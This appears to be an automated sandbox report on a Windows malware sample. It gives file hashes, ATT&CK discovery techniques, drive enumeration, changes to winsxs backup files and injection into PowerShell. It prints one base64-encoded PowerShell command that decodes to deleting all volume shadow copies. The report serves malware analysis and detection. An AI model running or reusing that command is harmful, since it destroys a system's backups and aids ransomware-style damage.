3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac

General

Target

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
Size

168KB
MD5

4055b029169ab30c5408bd0ab527a8ae
SHA1

a410032d78bbc13f8b32ed0f38f6208081518bc6
SHA256

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac
SHA512

dfb91472802e5b27c37861e3ebfc88a4b078dd2f123e06bd3541c53631fbded949fb3a3f8953341d8cffcf9ee0d1b02013a7ea2b02a7dd755ab57b91ab87caec

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

description	ioc	process
File opened (read-only)	\??\J:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\L:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\M:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\V:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\W:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\E:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\O:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\Q:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\S:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\T:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\Y:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\Z:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\G:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\H:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\I:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\K:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\N:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\X:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\A:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\B:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\F:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\P:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\R:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened (read-only)	\??\U:	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

Drops file in Windows directory 64 IoCs

Processes:

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

description	ioc	process
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-acledit_31bf3856ad364e35_6.1.7600.16385_none_67b7d66bbde58bb7_acledit.dll_89da72d2	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_zh-cn_7ede8a4d6e666a18_bootmgr.exe.mui_c434701f	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_lt-lt_fc1e49e41600d762.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..pwindowmanager-core_31bf3856ad364e35_6.1.7601.17514_none_ebc99983d3d18578_dwm.exe_04cf416e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..truetype-angsananew_31bf3856ad364e35_6.1.7600.16385_none_bfea396e1dabb335_angsai.ttf_284d5409	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_47cac8606858fb44.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasbase.resources_31bf3856ad364e35_6.1.7600.16385_de-de_111bacf3e074578c_rascfg.dll.mui_0b036e1f	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-newdev.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_718373162933d652_newdev.exe.mui_6ce4084e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_6.1.7600.16385_en-us_fe05ce1a062fbdb1_vds.exe.mui_2268d934	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-vssapi.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9894314efe077185.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_6.1.7601.17514_none_227e1c01642654f4_werdiagcontroller.dll_208f2db3	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17932_none_f1cc51dc6cfd0cbf_kernel32.dll_ef9eca7e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7600.16385_de-de_84c970b54d5773ed_msdasc.chm_e6d620a3	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-m..update-authenticamd_31bf3856ad364e35_6.1.7600.16385_none_599889656b4ace55.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-msxml30.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ecc2fd7371a03bd7_msxml3r.dll.mui_cd6e1e8f	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-w..r-webclnt.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_e1c41d9524eaf400.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_de-de_a0388400ce247642.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-i..tional-codepage-775_31bf3856ad364e35_6.1.7600.16385_none_cecaf17afc7bccc6.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-m..ditevtlog.resources_31bf3856ad364e35_6.1.7600.16385_en-us_59dbfa16bb2ffc3e_msaudite.dll.mui_dc90ce41	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_226c70953d052250_scfilter.sys.mui_cebab716	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-duser.resources_31bf3856ad364e35_6.1.7600.16385_en-us_d1256a4a3c8105f9_duser.dll.mui_3c369ac4	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-duser_31bf3856ad364e35_6.1.7600.16385_none_b6699ff0162b88a0_duser.dll_a2bd2fa9	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..r_service.resources_31bf3856ad364e35_6.1.7600.16385_de-de_65b99de8d68f5c62_iscsiexe.dll.mui_7d81b1cc	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_et-ee_42a75c1e8aba4151.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-efs-lsa-extension_31bf3856ad364e35_6.1.7600.16385_none_252f55f1cea824ce_efslsaext.dll_fdd731ab	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-searchfolder.resources_31bf3856ad364e35_6.1.7600.16385_de-de_d43cf1197e7ce94f_searchfolder.dll.mui_8c30bdaf	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_6.1.7600.16385_de-de_2e452ff3e70e56b2_rtm.dll.mui_55e4e990	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_9a8171aceaed6fe4.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-authentication-authui_31bf3856ad364e35_6.1.7601.17514_none_6a1982860c076c38.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_6.1.7601.17514_none_a2347d4102a4c8ad_ipsecsvc.dll_7136601a	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-w..nfrastructure-other_31bf3856ad364e35_6.1.7600.16385_none_6ace9e67456cc40b.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_226c70953d052250_sccls.dll.mui_f104be47	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b98e60acbd094074.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-networkbridge_31bf3856ad364e35_6.1.7600.16385_none_63dee2821fc69fce_bridgeres.dll_55e40455	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-lddmcore_31bf3856ad364e35_6.1.7601.17514_none_09ee9e0dfa2c4fbd.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver_31bf3856ad364e35_6.1.7601.17514_none_09cf3ec67e6c6b50_rasbase-rassstp-repl.man_f9e15598	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7600.16385_de-de_accc80812c85f01f_dhcpcsvc6.dll.mui_b45c7567	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f6a00d30a34ae11a_sdbinst.exe.mui_258ad624	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-aclui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9d9222b9cac3adcd_aclui.dll.mui_adadbfb7	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-axinstallservice_31bf3856ad364e35_6.1.7601.17514_none_352b5454878cd498_axinstsv.dll_ebc2b91e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-t..s-runtime.resources_31bf3856ad364e35_6.1.7600.16385_es-es_620abae030f0959c.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_en-us_4fbac3e2381c9426_scarddlg.dll.mui_300ae9df	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-verifier_31bf3856ad364e35_6.1.7600.16385_none_25fa2709e25e715f_verifier.dll_7b1988f4	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17932_none_fc20fc2ea15dceba_kernel32.dll_ef9eca7e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_7dc512637b53b684_wldap32.dll.mui_065dbd9c	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-fmifs_31bf3856ad364e35_6.1.7600.16385_none_56e4c7a892eacb36_fmifs.dll_cfc1a67d	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_6.1.7600.16385_zh-cn_3a5350f1e9bfcf28.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-vrinda_31bf3856ad364e35_6.1.7600.16385_none_d2195f0f72f474c8.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-shell32.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_5a529eebe274363c.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-d..irectdraw.resources_31bf3856ad364e35_6.1.7600.16385_de-de_c59ac573df5cb39a_ddraw.dll.mui_95b8c3ab	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..entication-usermode_31bf3856ad364e35_6.1.7600.16385_none_9616b4da8e0572c5.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-newdev.resources_31bf3856ad364e35_6.1.7600.16385_es-es_72ad61937e044eba_ndadmin.exe.mui_2e106c3e	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-gautami_31bf3856ad364e35_6.1.7600.16385_none_d7a960cbb5ebb166_gautamib.ttf_eba5f98c	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_pt-br_e3d3caff9933b424_mlang.dll.mui_2904864a	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_2b58ac2f7d84b22c_mlang.dll.mui_2904864a	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_6.1.7600.16385_en-us_d73605ecd5ec6277_mprdim.dll.mui_11b5ef08	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..core-base.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_f4f0ae70cac9cfaf_winmm.dll.mui_224f6445	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-directx-directdraw_31bf3856ad364e35_6.1.7600.16385_none_60fa9493d9b24564_ddraw.dll_8f1f5d02	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_d03d19912f2e87b9_sqlsoldb.chm_9573a554	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-msxml30.resources_31bf3856ad364e35_6.1.7600.16385_de-de_f717a7c5a600fdd2.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..temclient.resources_31bf3856ad364e35_6.1.7600.16385_en-us_d214d43964ec3fe5.manifest	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7438b7499bb92a94_gpsvc.dll.mui_0c160ac2	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..ional-codepage-1257_31bf3856ad364e35_6.1.7600.16385_none_8048648522902070_c_1257.nls_7347e598	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exepowershell.exe

pid process

1088 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
584 powershell.exe

pid	process
1088	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
584	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	584	powershell.exe
Token: SeBackupPrivilege	1300	vssvc.exe
Token: SeRestorePrivilege	1300	vssvc.exe
Token: SeAuditPrivilege	1300	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

description	pid	process	target process
PID 1088 wrote to memory of 584	1088	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe	powershell.exe
PID 1088 wrote to memory of 584	1088	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe	powershell.exe
PID 1088 wrote to memory of 584	1088	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe	powershell.exe
PID 1088 wrote to memory of 584	1088	3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
"C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1668

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/584-55-0x000007FEFC321000-0x000007FEFC323000-memory.dmp

Filesize
8KB

Download
memory/584-57-0x00000000025F0000-0x00000000025F2000-memory.dmp

Filesize
8KB

Download
memory/584-58-0x00000000025F2000-0x00000000025F4000-memory.dmp

Filesize
8KB

Download
memory/584-59-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/584-56-0x000007FEF35B0000-0x000007FEF410D000-memory.dmp

Filesize
11.4MB

Download
memory/584-60-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1088-54-0x0000000076C61000-0x0000000076C63000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads